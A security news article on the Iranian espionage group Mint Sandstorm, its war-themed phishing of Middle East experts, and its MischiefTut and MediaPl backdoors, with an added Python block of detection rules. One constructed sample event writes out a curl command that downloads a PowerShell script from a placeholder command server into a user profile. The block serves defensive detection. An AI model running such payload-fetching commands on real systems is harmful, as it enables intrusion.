Iranian Cyber Espionage Group Targets Experts on Israel-Hamas War


In recent months, a sophisticated Iranian cyber espionage group, identified as Mint Sandstorm (also known as APT35, Charming Kitten, TA453, and Yellow Garuda), has been actively targeting high-profile individuals involved in Middle Eastern affairs. These individuals, based in universities and research organizations across Belgium, France, Gaza, Israel, the U.K., and the U.S., have become victims of Mint Sandstorm’s carefully crafted phishing campaigns.

According to an analysis by the Microsoft Threat Intelligence team, this subgroup of Mint Sandstorm has demonstrated technical and operational maturity, employing bespoke phishing lures to trick targets into downloading malicious files. The attacks, ongoing since November 2023, have revealed the use of a previously undocumented backdoor called MediaPl, showcasing the group’s continuous efforts to enhance its post-intrusion tradecraft.

Mint Sandstorm, believed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), is notorious for its adept social engineering campaigns. The threat actor uses legitimate but compromised accounts to send personalized phishing emails, primarily targeting journalists, researchers, professors, and individuals with insights into security and policy matters of interest to Tehran.


The latest wave of attacks is characterized by the use of lures related to the Israel-Hamas war. The threat actors send seemingly innocuous emails under the guise of journalists and other high-profile figures to establish trust with targets before delivering malware. Microsoft suggests that the campaign likely aims to collect perspectives on events surrounding the war.

A notable aspect of this campaign is the use of breached accounts belonging to the impersonated individuals to send the email messages. Additionally, Mint Sandstorm uses the curl command to connect to its command-and-control (C2) infrastructure, adding a new tactic to its playbook.

Once targets engage with the threat actor, they receive follow-up emails containing malicious links leading to RAR archive files. Upon opening these files, Visual Basic scripts are retrieved from the C2 server to persist within the targets’ environments. This sets the stage for the deployment of custom implants like MischiefTut and MediaPl. MischiefTut, a basic backdoor disclosed by Microsoft in October 2023, operates in PowerShell, allowing it to run reconnaissance commands, write outputs to files, and download additional tools on compromised systems. MediaPl, masquerading as Windows Media Player, transmits encrypted communications to its C2 server and executes commands received from the server.
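As an added example (not from the article or from Microsoft's report), the following Python applies three detection rules derived from the chain described above to constructed process-creation events: a script host launching curl or PowerShell, curl writing a payload into a user profile, and a binary named like Windows Media Player running outside its install directory. Event field names, sample paths, the `c2.invalid` placeholder and the install-directory list are assumptions.

```python
"""Detection rules for the described intrusion chain, run over constructed events."""
from dataclasses import dataclass
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STAGING_TOOLS = {"curl.exe", "powershell.exe", "pwsh.exe"}
# Assumed legitimate install locations for Windows Media Player.
WMP_DIRS = (r"c:\program files\windows media player",
            r"c:\program files (x86)\windows media player")


@dataclass
class ProcEvent:  # assumed shape of a process-creation record
    parent_image: str
    image: str
    command_line: str


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every rule that fires for one event ([] = nothing suspicious)."""
    hits = []
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    cmd = ev.command_line.lower()
    # Rule 1: a VBS/JS script host spawning curl or PowerShell mirrors the staging step.
    if parent in SCRIPT_HOSTS and child in STAGING_TOOLS:
        hits.append("script_host_spawns_downloader")
    # Rule 2: curl saving its download under C:\Users\... rather than a system path.
    if child == "curl.exe" and ("-o " in cmd or "--output" in cmd) and "\\users\\" in cmd:
        hits.append("curl_writes_to_user_dir")
    # Rule 3: wmplayer.exe executing from somewhere other than its install directories.
    if child == "wmplayer.exe" and not ev.image.lower().startswith(WMP_DIRS):
        hits.append("wmplayer_masquerade")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (command line, fired rules) for each event that triggers at least one rule."""
    findings = []
    for ev in events:
        hits = detect(ev)
        if hits:
            findings.append((ev.command_line, hits))
    return findings


# Constructed sample events: two benign, two matching the described chain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Windows Media Player\wmplayer.exe", "wmplayer.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe", r"curl.exe https://example.org/ -o C:\Temp\index.html"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe", r"curl.exe http://c2.invalid/s.ps1 -o C:\Users\alice\AppData\Roaming\s.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Users\alice\AppData\Roaming\wmplayer.exe", "wmplayer.exe"),
]
```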


Mint Sandstorm’s continuous improvement of its tooling suggests a commitment to persisting in compromised environments while evading detection. The group’s ability to obtain and maintain remote access to target systems enables a range of activities that could compromise the confidentiality of those systems.

This revelation comes in the wake of a report by Dutch newspaper De Volkskrant, disclosing that Erik van Sabben, a Dutch engineer recruited by Israel and U.S. intelligence services, may have played a role in deploying an early variant of the Stuxnet malware in an Iranian nuclear facility using a water pump in 2007. The interconnected nature of cyber espionage and historical events highlights the evolving landscape of state-sponsored cyber threats.
